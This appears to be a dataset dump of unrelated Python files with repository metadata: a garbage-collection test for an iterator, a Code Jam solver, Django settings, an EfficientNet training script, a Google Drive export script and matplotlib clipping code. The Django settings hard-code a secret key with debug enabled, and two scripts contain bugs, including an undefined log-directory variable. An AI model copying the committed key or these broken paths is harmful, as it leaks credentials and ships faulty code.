    assert isinstance(lazy_tuple, nifty_collections.LazyTuple)
    # Nothing is consumed from the source until the LazyTuple is used.
    assert not lazy_tuple.collected_data
    assert lazy_tuple == \
           ((0, 1, 2), (1, 2, 3), (2, 3, 4), (3, 4, 5), (4, 5, 6))
def test_garbage_collection():
    """Items must become collectable as soon as they leave the sliding window.

    With length=3, after the k-th subsequence is produced, item k-2 is no
    longer referenced by the iterator and must be garbage-collected.
    """
    garbage_collected = set()
    class GarbageNoter:
        # Records its index into `garbage_collected` upon finalization.
        def __init__(self, n):
            assert isinstance(n, int)
            self.n = n
        def __del__(self):
            garbage_collected.add(self.n)
    iterable = (GarbageNoter(i) for i in range(7))
    consecutive_subsequences_iterator = \
        iterate_overlapping_subsequences(iterable, length=3)
    def assert_garbage_collected(indexes):
        # Force a collection so __del__ runs deterministically before checking.
        gc_tools.collect()
        assert set(indexes) == garbage_collected
    assert_garbage_collected(())
    next(consecutive_subsequences_iterator)
    assert_garbage_collected(())
    next(consecutive_subsequences_iterator)
    assert_garbage_collected((0,))
    next(consecutive_subsequences_iterator)
    assert_garbage_collected((0, 1))
    next(consecutive_subsequences_iterator)
    assert_garbage_collected((0, 1, 2))
    next(consecutive_subsequences_iterator)
    assert_garbage_collected((0, 1, 2, 3))
    with cute_testing.RaiseAssertor(StopIteration):
        next(consecutive_subsequences_iterator)
    # Once exhausted, everything must have been released.
    assert_garbage_collected((0, 1, 2, 3, 4, 5, 6))
def test_garbage_collection_wrap_around():
    """GC behavior with wrap_around=True.

    The first `length - 1` items (here 0 and 1) must be retained until the
    very end, because they are needed for the wrap-around subsequences, so
    collection starts later (from index 2) than in the non-wrapping test.
    """
    garbage_collected = set()
    class GarbageNoter:
        # Records its index into `garbage_collected` upon finalization.
        def __init__(self, n):
            assert isinstance(n, int)
            self.n = n
        def __del__(self):
            garbage_collected.add(self.n)
    iterable = (GarbageNoter(i) for i in range(7))
    consecutive_subsequences_iterator = \
        iterate_overlapping_subsequences(iterable, length=3, wrap_around=True)
    def assert_garbage_collected(indexes):
        # Force a collection so __del__ runs deterministically before checking.
        gc_tools.collect()
        assert set(indexes) == garbage_collected
    assert_garbage_collected(())
    next(consecutive_subsequences_iterator)
    assert_garbage_collected(())
    next(consecutive_subsequences_iterator)
    assert_garbage_collected(())
    next(consecutive_subsequences_iterator)
    assert_garbage_collected(())
    next(consecutive_subsequences_iterator)
    assert_garbage_collected((2,))
    next(consecutive_subsequences_iterator)
    assert_garbage_collected((2, 3))
    next(consecutive_subsequences_iterator)
    assert_garbage_collected((2, 3, 4))
    next(consecutive_subsequences_iterator)
    assert_garbage_collected((2, 3, 4, 5))
    with cute_testing.RaiseAssertor(StopIteration):
        next(consecutive_subsequences_iterator)
    assert_garbage_collected((0, 1, 2, 3, 4, 5, 6))
def test_short_iterables():
    """Iterables shorter than the requested length yield no subsequences."""
    assert tuple(iterate_overlapping_subsequences([1])) == ()
    assert tuple(iterate_overlapping_subsequences([1], length=7)) == ()
| [
"ram@rachum.com"
] | ram@rachum.com |
02fee580a449534a696d8a009b72407c8e92397c | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/16_0_3_neat/16_0_3_SGer_coinjam.py | ddadbc4f209398f6d0184b2127b91ea3acef6fb2 | [] | no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 1,674 | py | import sys
def primeCheck(n):
    """Return the smallest non-trivial divisor of n, or None if n is prime.

    Trial division over 2..sqrt(n), combined with a sieve over the candidate
    divisors so composite candidates are skipped.  Expects n >= 1 (n == 1 is
    treated like a prime and yields None; n == 0 is unsupported, as before).
    """
    # A divisor, if any, must appear at or below sqrt(n).
    upperBorder = int(n**0.5) + 1
    # sieve[i] is True while i is still a candidate (possibly prime) divisor.
    sieve = [True] * upperBorder
    sieve[0] = False
    sieve[1] = False
    for i in range(upperBorder):
        # Skip numbers already known to be composite.
        if not sieve[i]:
            continue
        # i is prime here; since we scan upward, the first hit is the
        # smallest divisor of n.
        if n % i == 0:
            return i
        # Mark all multiples of i as composite.  (Bug fix: the original
        # sieved only up to upperBorder // i, leaving most composites
        # unmarked and the sieve essentially useless.)
        for j in range(i * i, upperBorder, i):
            sieve[j] = False
    return None
# --- Command-line handling: the input file is the only required argument. ---
if (len(sys.argv) < 2):
    print "Need inputfile as argument"
    exit(1)
#read file
input = list()
with open(sys.argv[1], 'r') as f:
    input = f.read().splitlines()
# The first line is the case count; it is not needed, so drop it.
input.pop(0)
#convert to int list
# Each remaining line "N J" becomes a pair of ints [N, J].
input = map(lambda s: map(int, s.split(' ')), input)
def listToStr(indexList):
    """Join the items of indexList into a single space-separated string.

    Uses str.join instead of repeated string concatenation (which is
    quadratic) followed by trimming the trailing separator.
    """
    return " ".join(str(index) for index in indexList)
#compute
# For each case, enumerate N-digit binary-looking strings that start and end
# with 1, and keep the first J "jamcoins": strings that are composite when
# interpreted in every base 2..10.
output = list()
for (N, J) in input:
    # i spans the middle N-2 digits; the leading and trailing 1 are fixed.
    for i in xrange(int("1"+"0"*(N-2),2), int("1"*(N-1),2)+1):
        if (len(output) >= J):
            break
        bitString = bin(i)[2:]+"1"
        isPrime = False
        divisors = list()
        # Find Divisors or that one of the interpretations is prime
        for base in range(2,11):
            n = int(bitString,base)
            divisor = primeCheck(n)
            if (divisor is None):
                # Prime in some base: not a jamcoin, stop checking bases.
                isPrime = True
                break
            else:
                divisors.append(divisor)
                print "n: "+str(n)+" d: "+str(divisor)
        # If none of the interpretations were prime, we found a jamcoin
        if (not isPrime):
            output.append(str(bitString)+" "+listToStr(divisors))
#write file
# NOTE(review): only a single "Case #1:" header is written even though the
# input may contain several cases -- confirm against the judge format.
with open('output_coinjam.txt', 'w') as f:
    f.write("Case #1:\n")
    for line in output:
        f.write(line+"\n")
| [
"[dhuo@tcd.ie]"
] | [dhuo@tcd.ie] |
3976434872d602cbd85f8af7adc7780d589d700f | 0806d939ef0e8218c0f727e025eb0b3bb328d343 | /vote/polls/settings.py | 57025f38b164cace2fa091fd11f661cd86271aaf | [] | no_license | aiegoo/django-web | bcd89687d951e0877000c23230661ce566144e78 | 5476ed77cf95919d9b825f4cef03d42f217768ce | refs/heads/master | 2021-07-17T01:20:24.279227 | 2020-09-27T05:15:05 | 2020-09-27T05:15:05 | 215,240,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,156 | py | """
Django settings for polls project.
Generated by 'django-admin startproject' using Django 2.2.6.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to version control; rotate it and load
# it from the environment before any production deployment.
SECRET_KEY = 'j^7=0_6j4v3nqf3sodtvmra8f7r76d872&b6()b@ie9k6lpdna'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

# Bug fix: '127.0.0.0' is a network address, not a host, so local requests to
# 127.0.0.1 were never matched; the loopback host is '127.0.0.1'.
ALLOWED_HOSTS = ['178.128.223.232', 'localhost', '127.0.0.1']

# Application definition

INSTALLED_APPS = [
    'vote.apps.VoteConfig',
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'polls.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'polls.wsgi.application'

# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}

# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'UTC'

USE_I18N = True

USE_L10N = True

USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/

STATIC_URL = '/static/'
"eozz21@gmail.com"
] | eozz21@gmail.com |
7c5f7ab7b3a9edaffcf8c46037bdc4f1be5a349d | 871e1b0295c0fbbfca8191236d674866cf62ff01 | /TrainB7_NAR1_noisy-student.py | 6eee387bf281a62a200d38e6acdd02993bd6a410 | [] | no_license | Peckkie/USAI_ABnormal_Screening | ce31a813e9303a7d43def912ab731cc633268cb7 | 82cd63ac9ab72fbe68eae254c15c7bf7ef906022 | refs/heads/master | 2023-02-16T13:32:33.678500 | 2021-01-07T02:36:35 | 2021-01-07T02:36:35 | 277,981,638 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,082 | py | import PIL
from keras import models
from keras import layers
from tensorflow.keras import optimizers
import os
import glob
import shutil
import sys
import numpy as np
from skimage.io import imread
import matplotlib.pyplot as plt
import os
from tensorflow.keras import callbacks
import pandas as pd
from keras.utils import generic_utils
# Pin training to the first GPU.
os.environ["CUDA_VISIBLE_DEVICES"]="0"
from PIL import Image, ImageFile
# Tolerate truncated image files instead of raising during decoding.
ImageFile.LOAD_TRUNCATED_IMAGES = True
batch_size = 32
epochs = 200
#Train
dataframe = pd.read_csv( '/media/tohn/SSD/ImageForTrainTest/train.csv')
base_dir = '/media/tohn/SSD/ImageForTrainTest/'
os.chdir(base_dir)
train_dir = os.path.join(base_dir, 'train')
#validation
valframe = pd.read_csv( '/media/tohn/SSD/ImageForTrainTest/validation.csv')
validation_dir = os.path.join(base_dir, 'validation')
from efficientnet.keras import EfficientNetB7 as Net
from efficientnet.keras import center_crop_and_resize, preprocess_input
# First instantiation is only used to discover the model's native input size.
conv_base = Net(weights='noisy-student')
height = width = conv_base.input_shape[1]
input_shape = (height, width, 3)
# loading pretrained conv base model
conv_base = Net(weights='noisy-student', include_top=False, input_shape=input_shape)
# create new model with a new classification layer
x = conv_base.output
global_average_layer = layers.GlobalAveragePooling2D(name = 'head_pooling')(x)
dropout_layer_1 = layers.Dropout(0.50,name = 'head_dropout')(global_average_layer)
# Two-way softmax head: normal vs. abnormal.
prediction_layer = layers.Dense(2, activation='softmax',name = 'prediction_layer')(dropout_layer_1)
model = models.Model(inputs= conv_base.input, outputs=prediction_layer)
model.summary()
#showing before&after freezing
print('This is the number of trainable layers '
      'before freezing the conv base:', len(model.trainable_weights))
#conv_base.trainable = False  # freeze to preserve the convolutional base's weights
for layer in conv_base.layers:
    layer.trainable = False
print('This is the number of trainable layers '
      'after freezing the conv base:', len(model.trainable_weights)) # after freezing, only the new head (pooling + dense) stays trainable
from tensorflow.keras.preprocessing.image import ImageDataGenerator
# Heavy augmentation for training; validation data is only rescaled.
train_datagen = ImageDataGenerator(
      rescale=1./255,
      rotation_range=30,
      width_shift_range=0.2,
      height_shift_range=0.2,
      brightness_range=[0.5,1.5],
      shear_range=0.4,
      zoom_range=0.2,
      horizontal_flip=True,
      fill_mode='nearest')
test_datagen = ImageDataGenerator(rescale=1./255)
train_generator = train_datagen.flow_from_dataframe(
        dataframe = dataframe,
        directory = train_dir,
        x_col = 'Path Crop',
        y_col = 'Class',
        target_size = (height, width),
        batch_size=batch_size,
        color_mode= 'rgb',
        class_mode='categorical')
test_generator = test_datagen.flow_from_dataframe(
        dataframe = valframe,
        directory = validation_dir,
        x_col = 'Path Crop',
        y_col = 'Class',
        target_size = (height, width),
        batch_size=batch_size,
        color_mode= 'rgb',
        class_mode='categorical')
os.chdir('/media/tohn/SSD/trainEffbyB/R1')
# Base directory for this run's TensorBoard logs.
root_logdir = '/media/tohn/SSD/trainEffbyB/R1/my_logs_B7noisy'
def get_run_logdir():
    """Return a unique, timestamped log-directory path under ``root_logdir``."""
    import time
    timestamp = time.strftime("run_%Y_%m_%d_%H_%M_%S")
    return os.path.join(root_logdir, timestamp)
tensorboard_cb = callbacks.TensorBoard(log_dir = run_logdir)
# os.makedirs("./models", exist_ok=True)
def avoid_error(gen):
while True:
try:
data, labels = next(gen)
yield data, labels
except:
pass
#Training
model.compile(loss='categorical_crossentropy',
optimizer=optimizers.RMSprop(lr=2e-5),
metrics=['acc'])
history = model.fit_generator(
avoid_error(train_generator),
steps_per_epoch= len(dataframe)//batch_size,
epochs=epochs,
validation_data=avoid_error(test_generator),
validation_steps= len(valframe) //batch_size,
callbacks = [tensorboard_cb])
model.save('./models/B7_R1_noisy.h5')
| [
"w_yupaporn@kkumail.com"
] | w_yupaporn@kkumail.com |
b5b926c106c60946a48179e4795ab856cd8820bb | ac4b9385b7ad2063ea51237fbd8d1b74baffd016 | /.history/google/gmail_extract_20210219015211.py | c4d7dfe90ce25f2f1ff0dd84344c6a9d2cfe242a | [] | no_license | preethanpa/ssoemprep | 76297ef21b1d4893f1ac2f307f60ec72fc3e7c6f | ce37127845253c768d01aeae85e5d0d1ade64516 | refs/heads/main | 2023-03-09T00:15:55.130818 | 2021-02-20T06:54:58 | 2021-02-20T06:54:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,993 | py | from __future__ import print_function
import pickle
import os.path
import io
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from googleapiclient.http import MediaIoBaseDownload
from oauth2client.service_account import ServiceAccountCredentials
from google.oauth2 import service_account
import googleapiclient.discovery
import inspect
import sys
import json
# OAuth scopes requested for the Google API clients.
SCOPES = ['https://www.googleapis.com/auth/gmail.readonly'
          ]
# The ID of a sample document.
# DOCUMENT_ID = '1bQkFcQrWFHGlte8oTVtq_zyKGIgpFlWAS5_5fi8OzjY'
DOCUMENT_ID = '1sXQie19gQBRHODebxBZv4xUCJy-9rGpnlpM7_SUFor4'
# Service-account key used to authenticate API calls (previous key kept
# commented for reference).
# SERVICE_ACCOUNT_FILE = '/home/dsie/Developer/sandbox/3ray/3rml/kbc_process/google/domain-wide-credentials-gdrive.json'
SERVICE_ACCOUNT_FILE = '/home/dsie/Developer/sandbox/3ray/3rml/kbc_process/google/app-automation-service-account-thirdrayai-1612747564720-415d6ebd6001.json'
UPLOAD_FILE_LOCATION = '/home/dsie/Developer/sandbox/3ray/3rml/kbc_process/documents/pdf/'
# Google MIME types this script can export, keyed to the short names used
# when composing output file names.
doc_types = {
    "application/vnd.google-apps.document": "gdoc",
    # "application/vnd.google-apps.folder": "folder",
    "application/vnd.google-apps.spreadsheet": "gsheet",
    "application/vnd.google-apps.presentation": "gslide",
    "application/vnd.openxmlformats-officedocument.wordprocessingml.document": "docx"
}
# The job payload arrives as a JSON object string in argv[1].
# NOTE(review): when no argument is given, sys.argv[1] raises IndexError
# rather than being None, and the [] default has no .get() -- this path
# appears to rely on always being invoked with a payload; confirm.
drive_files_list = [] if (sys.argv is None or sys.argv[1] is None) else json.loads(sys.argv[1])
job_id = drive_files_list.get("job_id")
# Bug fix: json.loads returns a dict, so attribute access (.email_id) always
# raised AttributeError; use dict .get(), matching job_id above.
email_id = None if (sys.argv is None or sys.argv[1] is None) else json.loads(sys.argv[1]).get("email_id")
document_id = ''
def get_resource(domain_wide_delegate=False, user_to_impersonate=None):
    """Prepare a Google Drive resource object based on credentials.

    Without domain-wide delegation no credentials are built and None is
    returned (mirroring the original behaviour).  With delegation, the
    service-account key is loaded, optionally impersonating ``subject``.
    """
    if not domain_wide_delegate:
        return None
    # use subject in case of domain-wide delegation
    if user_to_impersonate is not None:
        credentials = service_account.Credentials.from_service_account_file(
            SERVICE_ACCOUNT_FILE, scopes=SCOPES, subject=user_to_impersonate)
    else:
        credentials = service_account.Credentials.from_service_account_file(
            SERVICE_ACCOUNT_FILE, scopes=SCOPES)
    if credentials is None:
        return None
    return build('drive', 'v3', credentials=credentials)
def download_drive_file(resource=None, document_id=None, google_file_type='gdoc', target_type=None, target_location=None):
    """Downloads a Google Drive file using the provided resource.
    If google_file_type is passed as None, then 'gdoc' / Google Doc is default.
    If target_type is passed as None, then 'application/pdf' is default.
    If location is none, then use environment variable UPLOAD_FILE_LOCATION as default

    Returns {"file": <output file name>} on success, or None on any failure
    (the richer error dicts are left commented out below).
    """
    # print(dir(resource.files())) #Get resource methods with dir.
    if resource is None:
        raise Exception('Invalid credentials. Provide subject email addredd for Drive-wide delegation')
    else:
        # Resolve the output extension and export MIME type for this pairing.
        extension, mimeType = extension_mime_type(google_file_type, target_type)
        try:
            # Export converts the Google-native document to the target type.
            content = resource.files().export(fileId=document_id, mimeType=mimeType).execute()
            try:
                with open(target_location+google_file_type+'-'+document_id+extension, "wb") as file:
                    file.write(content)
                return {"file": google_file_type+'-'+document_id+extension}
            except Exception as exc_in:
                # NOTE(review): write failures are silently reported as None;
                # callers append this to their results -- confirm intended.
                return
                # return {"document_id": document_id, "status": "Exception in with open", "message": exc_in}
        except Exception as exc_out:
            # NOTE(review): export/API failures likewise return None silently.
            return
            # return {"document_id": document_id, "status": "Exception in content = resource_files...", "message": exc_out}
def extension_mime_type(google_file_ext=None, format=None):
    """Map a Google file kind plus target format to (extension, MIME type).

    Returns a tuple of the dotted file extension and the export MIME type.
    When ``google_file_ext`` is None, the MIME type comes back as None
    (matching the original fall-through behaviour).  Unknown kinds or
    formats raise Exception with the same messages as before.
    """
    conversion_table = {
        'gdoc': {
            'docx': 'application/vnd.openxmlformats-officedocument.wordprocessingml.document',
            'epub': 'application/epub+zip',
            'html': 'text/html',
            'odt': 'application/vnd.oasis.opendocument.text',
            'pdf': 'application/pdf',
            'rtf': 'application/rtf',
            'tex': 'application/zip',
            'txt': 'text/plain',
            'html.zip': 'application/zip',
        },
        'gsheet': {
            'csv': 'text/csv',
            'html.zip': 'application/zip',
            'ods': 'application/x-vnd.oasis.opendocument.spreadsheet',
            'pdf': 'application/pdf',
            'tsv': 'text/tab-separated-values',
            'xlsx': 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',
        },
        'gslide': {
            'odp': 'application/vnd.oasis.opendocument.presentation',
            'pdf': 'application/pdf',
            'pptx': 'application/vnd.openxmlformats-officedocument.presentationml.presentation',
            'txt': 'text/plain',
        },
    }
    export_type = None
    if google_file_ext is not None:
        formats = conversion_table.get(google_file_ext)
        if formats is None:
            raise Exception('Unknown Google document extension "{}"'.format(google_file_ext))
        if format not in formats:
            raise Exception('Unknown format "{}"'.format(format))
        export_type = formats[format]
    return '.' + format, export_type
def get_email_labels(user, creds):
    """Shows basic usage of the Gmail API.
    Lists the user's Gmail labels by printing their names.
    """
    service = build('gmail', 'v1', credentials=creds)
    # Call the Gmail API
    response = service.users().labels().list(userId=user).execute()
    labels = response.get('labels', [])
    if not labels:
        print('No labels found.')
        return
    print('Labels:')
    for label in labels:
        print(label['name'])
# NOTE(review): dead branch -- presumably a placeholder for Gmail handling.
if email_id is not None:
    pass
if drive_files_list == []:
    # Nothing to process: echo the (empty) payload back as JSON.
    print(json.dumps(drive_files_list))
else:
    # Per-job output folders for the exported PDFs and HTML.
    location = os.path.join('/home/dsie/Developer/sandbox/3ray/3rml/kbc_process/drive_documents/', job_id+'/pdf/')
    os.makedirs(location)
    location_html = os.path.join('/home/dsie/Developer/sandbox/3ray/3rml/kbc_process/drive_documents/', job_id+'/html/')
    os.makedirs(location_html)
    response_message = {
        "job_id": job_id,
        "status": "OK",
        "processed_files": []
    }
    for index, item in enumerate(drive_files_list.get('files')):
        try:
            # Files with MIME types outside doc_types raise KeyError and
            # are skipped by the except below.
            google_file_type = doc_types[item.get('mimeType')]
            drive_document_id = item.get('id')
            target_file_type = "pdf"
            # NOTE(review): get_resource(domain_wide_delegate=False) returns
            # None, which makes download_drive_file raise -- and that
            # Exception is NOT a KeyError, so it would escape this loop.
            # Confirm whether delegation was meant to be enabled here.
            dl_response = download_drive_file(resource=get_resource(domain_wide_delegate=False), document_id=drive_document_id, google_file_type=google_file_type, target_type=target_file_type, target_location=location)
            response_message["processed_files"].append(dl_response)
        except KeyError as ke:
            pass
    print(json.dumps(response_message))
# print(download_drive_file(resource=get_resource(domain_wide_delegate=False)), google_file_type=google_file_type, target_type=target_file_type, target_location=location) | [
"{abhi@third-ray.com}"
] | {abhi@third-ray.com} |
aff1b4c074ab609ca6ddccae8c356a723e774856 | ed98f15f0daf3a9a0cb033bded3b97207b6a3382 | /pylonsprojectjp/apps/admin/__init__.py | 59a11c4220e220e1545a4c57f14f03913d4fde95 | [] | no_license | knzm/pylonsprojectjp_site | 56b4b3eb400f3588a97c1898759a53abca553635 | 4b2fd1875ab1c4e4d2e5a2ba946b6c462bc2d90e | refs/heads/master | 2021-01-19T11:17:30.521824 | 2014-01-24T15:00:30 | 2014-01-24T15:00:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 194 | py | # -*- coding: utf-8 -*-
from .utils import admin_config, ListColumn
__all__ = ['admin_config', 'ListColumn']
def includeme(config):
    """Pyramid include hook: registers the ``add_admin`` configuration directive."""
    config.add_directive('add_admin', '.utils.add_admin')
| [
"nozom.kaneko@gmail.com"
] | nozom.kaneko@gmail.com |
ac840a5275bbbdffb5197eccb724645e65106c64 | b7e9057d7083759cf5193083b4864f6ca9dd9144 | /Longest_Increasing_Subsequence.py | 469379278526ef4b76f1ab1bd58b65c543a7cf66 | [] | no_license | vishalagrawalit/Competitive-Programming | 21a5c63de4fdbe8cbbfeb8b62d62af3c79972cad | b34faafd15f3e97050a8e2c39e3358e7a8ffdc5a | refs/heads/master | 2021-12-24T08:58:20.269152 | 2017-12-14T17:59:05 | 2017-12-14T17:59:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 609 | py | def search(arr,l,r,key):
while(r-l>1):
m = l+(r-l)//2
if (arr[m] >= key):
r = m
else:
l = m
return r
def sequence(arr):
if len(arr)==0:
return 0
tail = [0]*len(arr)
length = 1
tail[0] = arr[0]
for i in range(1,len(arr)):
if arr[i] < tail[0]:
tail[0] = arr[i]
elif arr[i] > tail[length - 1]:
tail[length]=arr[i]
length +=1
else:
tail[search(tail, -1, length-1, arr[i])] = arr[i]
return length
# Demo: the LIS of this array is 2,3,7,8,10,13 -> length 6.
arr = [2,5,3,7,11,8,10,13,6,75]
print(sequence(arr))
| [
"vishvishu14@gmail.com"
] | vishvishu14@gmail.com |
a0598efb487953b92293d2f61626bf178d0b4e7d | c2df9e04adec78e789d1fbdb0711c45e5b9263a7 | /venv/Lib/site-packages/mpl_toolkits/axisartist/clip_path.py | d494365ef3c9347f3cdc5882e5efd8a907ad1b7f | [
"MIT",
"BSD-3-Clause"
] | permissive | AdarshSai/Final_Project | 433009a2f416e894ee3be85cd9317cb8e8df5516 | f966834ca72dd232102ed500ef47ef2b3bdbed5b | refs/heads/main | 2023-01-23T12:21:41.342074 | 2020-11-19T22:24:15 | 2020-11-19T22:24:15 | 308,898,012 | 0 | 1 | MIT | 2020-11-19T22:24:17 | 2020-10-31T14:19:58 | Python | UTF-8 | Python | false | false | 3,895 | py | import numpy as np
from math import degrees
from matplotlib import cbook
import math
def atan2(dy, dx):
    """Like math.atan2, but warns and returns 0 for the undefined (0, 0) input."""
    both_zero = (dx == 0) and (dy == 0)
    if not both_zero:
        return math.atan2(dy, dx)
    cbook._warn_external("dx and dy are 0")
    return 0
# FIXME : The current algorithm seems to return incorrect angle when the line
# ends at the boundary.
def clip(xlines, ylines, x0, clip="right", xdir=True, ydir=True):
    """Clip polylines against the vertical threshold x0.

    For each (x, y) line, segments on the kept side of x0 are collected
    into *clipped_xlines*/*clipped_ylines*; each boundary crossing is
    interpolated and recorded in *_pos_angles* as (x0, y0, angle), where
    the angle (in degrees) is sign-adjusted by xdir/ydir.
    NOTE(review): see the module-level FIXME -- the angle can be wrong
    when a line ends exactly on the boundary.
    """
    clipped_xlines = []
    clipped_ylines = []
    _pos_angles = []
    xsign = 1 if xdir else -1
    ysign = 1 if ydir else -1
    for x, y in zip(xlines, ylines):
        # b marks samples strictly on the kept side; db flags crossings:
        # -1 where the line leaves the kept region, +1 where it enters.
        if clip in ["up", "right"]:
            b = (x < x0).astype("i")
            db = b[1:] - b[:-1]
        else:
            b = (x > x0).astype("i")
            db = b[1:] - b[:-1]
        # ns is the start index of the currently-open kept segment
        # (-1 is used as a "no open segment" sentinel).
        if b[0]:
            ns = 0
        else:
            ns = -1
        segx, segy = [], []
        for (i,) in np.argwhere(db):
            c = db[i]
            if c == -1:
                # Leaving the kept side: interpolate the exit point and
                # close the current segment at (x0, y0).
                dx = (x0 - x[i])
                dy = (y[i+1] - y[i]) * (dx / (x[i+1] - x[i]))
                y0 = y[i] + dy
                clipped_xlines.append(np.concatenate([segx, x[ns:i+1], [x0]]))
                clipped_ylines.append(np.concatenate([segy, y[ns:i+1], [y0]]))
                ns = -1
                segx, segy = [], []
                # Degenerate crossing: fall back to the segment direction.
                if dx == 0. and dy == 0:
                    dx = x[i+1] - x[i]
                    dy = y[i+1] - y[i]
                a = degrees(atan2(ysign*dy, xsign*dx))
                _pos_angles.append((x0, y0, a))
            elif c == 1:
                # Entering the kept side: interpolate the entry point and
                # open a new segment starting at (x0, y0).
                dx = (x0 - x[i])
                dy = (y[i+1] - y[i]) * (dx / (x[i+1] - x[i]))
                y0 = y[i] + dy
                segx, segy = [x0], [y0]
                ns = i+1
                if dx == 0. and dy == 0:
                    dx = x[i+1] - x[i]
                    dy = y[i+1] - y[i]
                a = degrees(atan2(ysign*dy, xsign*dx))
                _pos_angles.append((x0, y0, a))
        # Flush any segment still open at the end of the line.
        if ns != -1:
            clipped_xlines.append(np.concatenate([segx, x[ns:]]))
            clipped_ylines.append(np.concatenate([segy, y[ns:]]))
    return clipped_xlines, clipped_ylines, _pos_angles
def clip_line_to_rect(xline, yline, bbox):
    """Clip a single line to a rectangle given by *bbox*.

    Clips successively against the right/left x-bounds and the top/bottom
    y-bounds (swapping the roles of x and y for the vertical pass), then
    normalizes the recorded crossing angles per edge.  Returns the kept
    (x, y) segment pairs and a 4-item list of per-edge
    [(point, angle), ...] for the left, bottom, right and top edges.
    """
    x0, y0, x1, y1 = bbox.extents
    # Axis orientation flags; inverted axes flip the crossing-angle signs.
    xdir = x1 > x0
    ydir = y1 > y0
    if x1 > x0:
        lx1, ly1, c_right_ = clip([xline], [yline], x1,
                                  clip="right", xdir=xdir, ydir=ydir)
        lx2, ly2, c_left_ = clip(lx1, ly1, x0,
                                 clip="left", xdir=xdir, ydir=ydir)
    else:
        # Inverted x-axis: the numeric bounds swap roles.
        lx1, ly1, c_right_ = clip([xline], [yline], x0,
                                  clip="right", xdir=xdir, ydir=ydir)
        lx2, ly2, c_left_ = clip(lx1, ly1, x1,
                                 clip="left", xdir=xdir, ydir=ydir)
    if y1 > y0:
        # Vertical pass: feed y as the clipping coordinate.
        ly3, lx3, c_top_ = clip(ly2, lx2, y1,
                                clip="right", xdir=ydir, ydir=xdir)
        ly4, lx4, c_bottom_ = clip(ly3, lx3, y0,
                                   clip="left", xdir=ydir, ydir=xdir)
    else:
        ly3, lx3, c_top_ = clip(ly2, lx2, y0,
                                clip="right", xdir=ydir, ydir=xdir)
        ly4, lx4, c_bottom_ = clip(ly3, lx3, y1,
                                   clip="left", xdir=ydir, ydir=xdir)
    # Re-map raw crossing angles into each edge's angular range and drop
    # crossings that fall outside the rectangle's extent along that edge.
    c_left = [((x, y), (a + 90) % 180 - 90) for x, y, a in c_left_
              if bbox.containsy(y)]
    c_bottom = [((x, y), (90 - a) % 180) for y, x, a in c_bottom_
                if bbox.containsx(x)]
    c_right = [((x, y), (a + 90) % 180 + 90) for x, y, a in c_right_
               if bbox.containsy(y)]
    c_top = [((x, y), (90 - a) % 180 + 180) for y, x, a in c_top_
             if bbox.containsx(x)]
    return list(zip(lx4, ly4)), [c_left, c_bottom, c_right, c_top]
| [
"adarshsaig@gmail.com"
] | adarshsaig@gmail.com |
d264afccd70fdf9c18c2efb1cf3cc64e43bb66bf | 8b56726a0e92d1d9cdb0516a7ba441927a6f934c | /mezzanine_slides/admin.py | c75871a2726c7d7202c494ec7cf7142dc3e42e02 | [
"BSD-2-Clause"
